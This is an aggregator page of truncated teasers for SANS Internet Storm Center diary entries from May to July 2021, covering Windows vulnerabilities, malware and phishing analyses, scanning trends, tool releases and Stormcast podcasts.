This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, July 26th, 2021…
Tag: SANS Internet Storm Center, InfoCON: green
Wireshark 3.4.7 Released, (Sun, Jul 25th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Wireshark version 3.4.7 was released. Read the original article: Wireshark 3.4.7 Released, (Sun, Jul 25th)
Active Directory Certificate Services (ADCS – PKI) domain admin vulnerability, (Sat, Jul 24th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Phew, this was a really bad week for Microsoft (and a lot of reading for all of us). And just when we thought that the fiasco with the…
Agent.Tesla Dropped via a .daa Image and Talking to Telegram, (Sat, Jul 24th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green A few days ago, I found an interesting file delivered by email (why change a winning combination?). The file has a nice extension: â.daaâ (Direct Access Archive). We…
Uncovering Shenanigans in an IP Address Block via Hurricane Electric’s BGP Toolkit (II), (Fri, Jul 23rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Today’s diary revisits hunting for dodgy domains via Hurricane Electric's BGP Toolkit [1]. This was previously done in an earlier diary [2], and I plan to do this…
ISC Stormcast For Friday, July 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7598, (Fri, Jul 23rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, July 23rd, 2021…
Lost in the Cloud: Akamai DNS Outage, (Thu, Jul 22nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green As we already got a number of notes from readers: Currently, Akamai's DNS service appears to experience an outage that affects numerous other large websites. Read the…
ISC Stormcast For Thursday, July 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7596, (Thu, Jul 22nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, July 22nd, 2021…
“Summer of SAM”: Microsoft Releases Guidance for CVE-2021-36934, (Wed, Jul 21st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Microsoft released a knowledge base article regarding CVE-2021-36934 [1]. Bojan yesterday explained the vulnerability in more detail. Recent versions of Microsoft Windows expose several system files due to…
ISC Stormcast For Wednesday, July 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7594, (Wed, Jul 21st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, July 21st, 2021…
Summer of SAM – incorrect permissions on Windows 10/11 hives, (Tue, Jul 20th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green If you opened Twitter today you were probably flooded with news about the latest security issue with Windows. For those that have ISC as their home page (yay!)…
ISC Stormcast For Tuesday, July 20th, 2021 https://isc.sans.edu/podcastdetail.html?id=7592, (Tue, Jul 20th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, July 20th, 2021…
New Windows Print Spooler Vulnerability – CVE-2021-34481, (Mon, Jul 19th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green A new, unpatched, vulnerability has been discovered in the Windows Print Spooler and is being tracked under CVE-2021-34481. Discovered by Jacob Baines at Dragos, this one requires local…
ISC Stormcast For Monday, July 19th, 2021 https://isc.sans.edu/podcastdetail.html?id=7590, (Mon, Jul 19th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, July 19th, 2021…
Video: CyberChef BASE85 Decoding, (Sun, Jul 18th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green In this video, I show how to decode the sample of Xavier's diary entry “Multiple BaseXX Obfuscations” with CyberChef. Read the original article: Video: CyberChef BASE85 Decoding, (Sun,…
BASE85 Decoding With base64dump.py, (Sat, Jul 17th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Xavier's diary entry “Multiple BaseXX Obfuscations” covers a malicious script that is encoded with different “base” encodings. Xavier starts with my tool base64dump.py, but he can not do…
Multiple BaseXX Obfuscations, (Fri, Jul 16th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green I found an interesting malicious Python script during my daily hunting routine. The script has a VT score of 2/58[1] (SHA256: 6990298edd0d66850578bfd1e1b9d42abfe7a8d1deb828ef0c7017281ee7c5b7). Its purpose is to perform the…
ISC Stormcast For Friday, July 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7588, (Fri, Jul 16th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, July 16th, 2021…
ISC Stormcast For Thursday, July 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7586, (Thu, Jul 15th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, July 15th, 2021…
USPS Phishing Using Telegram to Collect Data, (Tue, Jul 13th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Phishing… at least they don't understand security any better than most kids. The latest example is a simple USPS phish. The lure is an email claiming that a…
One way to fail at malspam – give recipients the wrong password for an encrypted attachment , (Wed, Jul 14th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green It is not unusual for malspam authors to encrypt the malicious files that they attach to messages they send out. Whether they encrypt the malicious file itself (as…
ISC Stormcast For Wednesday, July 14th, 2021 https://isc.sans.edu/podcastdetail.html?id=7584, (Wed, Jul 14th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, July 14th, 2021…
Microsoft July 2021 Patch Tuesday, (Tue, Jul 13th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This month we got patches for 117 vulnerabilities. Of these, 13 are critical, 6 were previously disclosed and 4 are being exploited according to Microsoft. Read the original…
ISC Stormcast For Tuesday, July 13th, 2021 https://isc.sans.edu/podcastdetail.html?id=7582, (Tue, Jul 13th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, July 13th, 2021…
ISC Stormcast For Monday, July 12th, 2021 https://isc.sans.edu/podcastdetail.html?id=7580, (Mon, Jul 12th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, July 12th, 2021…
Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat, (Mon, Feb 15th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green [This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)] Read the original article: Securing…
Scanning for Microsoft Secure Socket Tunneling Protocol, (Sat, Jul 10th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Over the past month I noticed a resurgence of probe by Digitalocean looking for the Microsoft (MS) Secure Socket Tunneling Protocol (SSTP). This MS proprietary VPN protocol is…
ISC Stormcast For Friday, July 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7578, (Fri, Jul 9th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, July 9th, 2021…
Hancitor tries XLL as initial malware file, (Fri, Jul 9th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Introduction Read the original article: Hancitor tries XLL as initial malware file, (Fri, Jul 9th)
Using Sudo with Python For More Security Controls, (Thu, Jul 8th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green I'm a big fan of the Sudo[1] command. This tool, available on every UNIX flavor, allows system administrators to provide access to certain users/groups to certain commands as…
ISC Stormcast For Thursday, July 8th, 2021 https://isc.sans.edu/podcastdetail.html?id=7576, (Thu, Jul 8th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, July 8th, 2021…
ISC Stormcast For Wednesday, July 7th, 2021 https://isc.sans.edu/podcastdetail.html?id=7574, (Wed, Jul 7th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, July 7th, 2021…
Microsoft Releases Patches for CVE-2021-34527, (Wed, Jul 7th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Microsoft today released patches for CVE-2021-34527, the vulnerability also known as “printnightmare”. Patches are currently available for these versions of Windows: Read the original article: Microsoft Releases Patches…
Python DLL Injection Check, (Tue, Jul 6th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green They are many security tools that inject DLL into processes running on a Windows system. The classic examples are anti-virus products. They like to inject plenty of code…
ISC Stormcast For Tuesday, July 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7572, (Tue, Jul 6th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, July 6th, 2021…
ISC Stormcast For Monday, July 5th, 2021 https://isc.sans.edu/podcastdetail.html?id=7570, (Sun, Jul 4th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, July 5th, 2021…
DIY CD/DVD Destruction – Follow Up, (Sun, Jul 4th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Thanks a lot to all of you who posted a comment on my diary entry “DIY CD/DVD Destruction”. They inspired me to try out some other methods. Read…
Finding Strings With oledump.py, (Sat, Jul 3rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green In diary entry “CFBF Files Strings Analysis” I show how to extract strings from CFBF/ole files with my tool oledump.py. Read the original article: Finding Strings With oledump.py,…
Kaseya VSA Users Hit by Ransomware, (Fri, Jul 2nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green We are aware that some MSSP's customers (Managed Security Services Providers) have been hit by a ransomware. It seems that four(4) MSSP's have been affected until now. The…
ISC Stormcast For Friday, July 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7568, (Fri, Jul 2nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, July 2nd, 2021…
“inception.py”… Multiple Base64 Encodings, (Fri, Jul 2nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green “Inception” is a very nice SF movie in which, if you did not watch it, dreams are implemented in people's minds to help to get access to sensitive information…
ISC Stormcast For Thursday, July 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7566, (Thu, Jul 1st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, July 1st, 2021…
CVE-2021-1675: Incomplete Patch and Leaked RCE Exploit, (Wed, Jun 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green [preliminary. please let us know if we missed something or made any mistakes] Read the original article: CVE-2021-1675: Incomplete Patch and Leaked RCE Exploit, (Wed, Jun 30th)
June 2021 Forensic Contest: Answers and Analysis, (Wed, Jun 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Introduction Read the original article: June 2021 Forensic Contest: Answers and Analysis, (Wed, Jun 30th)
ISC Stormcast For Tuesday, June 29th, 2021 https://isc.sans.edu/podcastdetail.html?id=7562, (Tue, Jun 29th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, June 29th, 2021…
Diving into a Google Sweepstakes Phishing E-mail, (Tue, Jun 29th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green I was recently forwarded another phishing e-mail to examine. This time, it was an e-mail that claimed to be from Google. The e-mail included a pdf file, and…
CFBF Files Strings Analysis, (Mon, Jun 28th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green The Office file format that predates the OOXML format, is a binary format based on the CFBF format. I informally call this the ole file format. Read the…
ISC Stormcast For Monday, June 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7560, (Mon, Jun 28th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, June 28th, 2021…
DIY CD/DVD Destruction, (Sun, Jun 27th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green I have some personal CDs & DVDs to dispose of. And I don't want them to reamain (easily) readable. Read the original article: DIY CD/DVD Destruction, (Sun, Jun…
CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This XML External Entity injection (XXE) vulnerability disclosed in March 2019 is still actively scanned for a vulnerable mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.…
ISC Stormcast For Friday, June 25th, 2021 https://isc.sans.edu/podcastdetail.html?id=7558, (Fri, Jun 25th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, June 25th, 2021…
Is this traffic bAD?, (Fri, Jun 25th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green It seems like every time I take a handler shift lately, I'm talking about an uptick of traffic on another port and I'm not breaking that trend today.…
Do you Like Cookies? Some are for sale!, (Thu, Jun 24th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Cookies⦠These small pieces of information are always with us. Since the GDPR was kicked off in Europe, we are flooded by pop-ups asking if we accept âcookiesâ.…
ISC Stormcast For Thursday, June 24th, 2021 https://isc.sans.edu/podcastdetail.html?id=7556, (Thu, Jun 24th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, June 24th, 2021…
Standing With Security Researchers Against Misuse of the DMCA, (Wed, Jun 23rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green As Dean of Research for our graduate school (sans.edu), I often assist students in developing their research ideas. The research conducted by our students is valuable and important…
ISC Stormcast For Wednesday, June 23rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7554, (Wed, Jun 23rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, June 23rd, 2021…
ISC Stormcast For Monday, June 21st, 2021 https://isc.sans.edu/podcastdetail.html?id=7550, (Mon, Jun 21st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, June 21st, 2021…
Executives and Ransomware Webcast: Stop, Collaborate, and Listen! – https://www.sans.org/webcasts/executives-ransomware-stop-collaborate-listen-120150, (Mon, Jun 21st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green — Rick Wanner MSISE – rwanner at isc dot sans dot edu – Twitter:namedeplume (Protected) Read the original article: Executives and Ransomware Webcast: Stop, Collaborate, and Listen! –…
Mitre CWE – Common Weakness Enumeration, (Mon, Jun 21st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green If you are involved in the security industry  you are at least somewhat familiar with the Mitre ATT&CK framework, the very useful, community driven, knowledgebase of attack threat…
ISC Stormcast For Tuesday, June 22nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7552, (Tue, Jun 22nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, June 22nd, 2021…
Phishing asking recipients not to report abuse, (Tue, Jun 22nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green It can be a little disheartening to deal with well-prepared phishing attacks every day, since one can easily see how even users who are fully âsecurity-awareâ could fall…
ISC Stormcast For Wednesday, June 16th, 2021 https://isc.sans.edu/podcastdetail.html?id=7544, (Wed, Jun 16th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, June 16th, 2021…
Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more, (Tue, Jun 15th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Vulnerable perimeter devices remain a popular target, and we do see consistent exploit attempts against them. This weekend, Guy wrote about some scans for Fortinet vulnerabilities [1], and…
ISC Stormcast For Tuesday, June 15th, 2021 https://isc.sans.edu/podcastdetail.html?id=7542, (Tue, Jun 15th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, June 15th, 2021…
ISC Stormcast For Monday, June 14th, 2021 https://isc.sans.edu/podcastdetail.html?id=7540, (Mon, Jun 14th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, June 14th, 2021…
Update: mac-robber.py, (Sun, Jun 13th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Almost 4 years ago, I wrote a python version of mac-robber. I use it fairly regularly at $dayjob. This past week, one of my co-workers was using it,…
Fortinet Targeted for Unpatched SSL VPN Discovery Activity, (Sat, Jun 12th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Over the past 60 days, I have observed scanning activity to discover FortiGate SSL VPN unpatched services. Fortinet has fixed several critical vulnerabilities in SSL VPN and web…
Sonicwall SRA 4600 Targeted By an Old Vulnerability, (Fri, Jun 11th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Devices and applications used to provide remote access are juicy targets. I've already been involved in many ransomware cases and most of the time, the open door was…
Keeping an Eye on Dangerous Python Modules, (Fri, Jun 11th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green With Python getting more and more popular, especially on Microsoft Operating systems, it's common to find malicious Python scripts today. I already covered some of them in previous…
ISC Stormcast For Friday, June 11th, 2021 https://isc.sans.edu/podcastdetail.html?id=7538, (Fri, Jun 11th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, June 11th, 2021…
Are Cookie Banners a Waste of Time or a Complete Waste of Time?, (Thu, May 20th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Legislation, in particular in the European Union, has led to a proliferation of “Cookie Banners.” Warning banners that either ask you for blanket permission to set cookies or,…
ISC Stormcast For Thursday, June 10th, 2021 https://isc.sans.edu/podcastdetail.html?id=7536, (Thu, Jun 10th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, June 10th, 2021…
Architecture, compilers and black magic, or “what else affects the ability of AVs to detect malicious files”, (Wed, Jun 9th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green In my last diary, we went over the impact of different Base encodings on the ability of anti-malware tools to detect malicious code[1]. Since results of our tests…
ISC Stormcast For Wednesday, June 9th, 2021 https://isc.sans.edu/podcastdetail.html?id=7534, (Wed, Jun 9th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, June 9th, 2021…
Microsoft June 2021 Patch Tuesday, (Tue, Jun 8th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This month we got patches for 50 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed and 6 is already being exploited according to Microsoft. Read the…
ISC Stormcast For Tuesday, June 8th, 2021 https://isc.sans.edu/podcastdetail.html?id=7532, (Tue, Jun 8th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, June 8th, 2021…
Amazon Sidewalk: Cutting Through the Hype, (Mon, Jun 7th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Later this week (tomorrow?), Amazon will enable its new Sidewalk feature. The feature has already gotten a lot of bad press. Much of this comes from the fact…
ISC Stormcast For Monday, June 7th, 2021 https://isc.sans.edu/podcastdetail.html?id=7530, (Mon, Jun 7th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Monday, June 7th, 2021…
Strange goings on with port 37, (Thu, Jun 3rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Similar to Yee Ching's diary on Thursday, I noticed an oddity in the Dshield data last weekend (which I had hoped to discuss in a diary on Wednesday,…
Russian Dolls VBS Obfuscation, (Fri, Jun 4th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat!…
ISC Stormcast For Friday, June 4th, 2021 https://isc.sans.edu/podcastdetail.html?id=7528, (Fri, Jun 4th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, June 4th, 2021…
DShield Data Analysis: Taking a Look at Port 45740 Activity, (Thu, Jun 3rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green At the SANS Internet Storm Center (ISC), handlers frequently analyze data submitted from DShield participants to determine activity trends and potential attacks. A few days ago on May…
ISC Stormcast For Thursday, June 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7526, (Thu, Jun 3rd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, June 3rd, 2021…
Wireshark 3.4.6 (and 3.2.14) released, (Wed, Jun 2nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green A new version of wireshark is out, a couple of bugfixes including a QUIC TLK decryption issue. Also, the Windows version now comes with npcap 1.31 (updated from…
ISC Stormcast For Wednesday, June 2nd, 2021 https://isc.sans.edu/podcastdetail.html?id=7524, (Wed, Jun 2nd)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, June 2nd, 2021…
Guildma is now using Finger and Signed Binary Proxy Execution to evade defenses, (Mon, May 31st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Read the original article: Guildma is now using Finger and Signed Binary Proxy Execution to evade defenses, (Mon, May 31st)
ISC Stormcast For Tuesday, June 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7522, (Tue, Jun 1st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Tuesday, June 1st, 2021…

Video: Cobalt Strike & DNS – Part 1, (Sun, May 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green One of the Cobalt Strike servers reported by Brad Duncan also communicates over DNS. Read the original article: 
Video: Cobalt Strike & DNS – Part 1, (Sun, May…
Quick and dirty Python: nmap, (Mon, May 31st)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Continuing on from the “Quick and dirty Python: masscan” diary, which implemented a simple port scanner in Python using masscan to detect web instances on TCP ports 80…
Video: Cobalt Strike & DNS – Part 1, (Sun, May 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green One of the Cobalt Strike servers reported by Brad Duncan also communicates over DNS. Read the original article: Video: Cobalt Strike & DNS – Part 1, (Sun, May…
YARA Release v4.1.1, (Sun, May 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green YARA version 4.1.1 was released. Read the original article: YARA Release v4.1.1, (Sun, May 30th)
Sysinternals: Procmon, Sysmon, TcpView and Process Explorer update, (Sun, May 30th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green New versions of Sysinternals' tools Procmon, Sysmon, TcpView and Process Explorer were released. Read the original article: Sysinternals: Procmon, Sysmon, TcpView and Process Explorer update, (Sun, May 30th)
Spear-phishing Email Targeting Outlook Mail Clients , (Sat, May 29th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green In February I posted about spam pretending to be an Outlook Version update [1] and now for the past several weeks I have been receiving spear-phishing emails that…
Malicious PowerShell Hosted on script.google.com, (Fri, May 28th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Google has an incredible portfolio of services. Besides the classic ones, there are less known services and… they could be very useful for attackers too. One of them…
ISC Stormcast For Friday, May 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7520, (Fri, May 28th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Friday, May 28th, 2021…
All your Base are…nearly equal when it comes to AV evasion, but 64-bit executables are not, (Thu, May 27th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of…
ISC Stormcast For Thursday, May 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7518, (Thu, May 27th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Thursday, May 27th, 2021…
ISC Stormcast For Wednesday, May 26th, 2021 https://isc.sans.edu/podcastdetail.html?id=7516, (Wed, May 26th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green This post doesn’t have text content, please click on the link below to view the original article. Read the original article: ISC Stormcast For Wednesday, May 26th, 2021…
A Survey of Bluetooth Vulnerabilities Trends, (Wed, May 26th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green As usage of fitness trackers, wireless headsets and smart home devices become increasingly popular in our daily lives, a growing reliance on the Bluetooth protocol is expected as…
VMware Security Advisory VMSA-2021-0010, (Tue, May 25th)
This article has been indexed from SANS Internet Storm Center, InfoCON: green VMware has issued a critical security advisory VMSA-2021-0010 (CVSSv3 score ranging from 6.5-9.8). The products affected are VMware vCenter Server and VMware Cloud Foundation, and addresses CVE-2021-21985 and…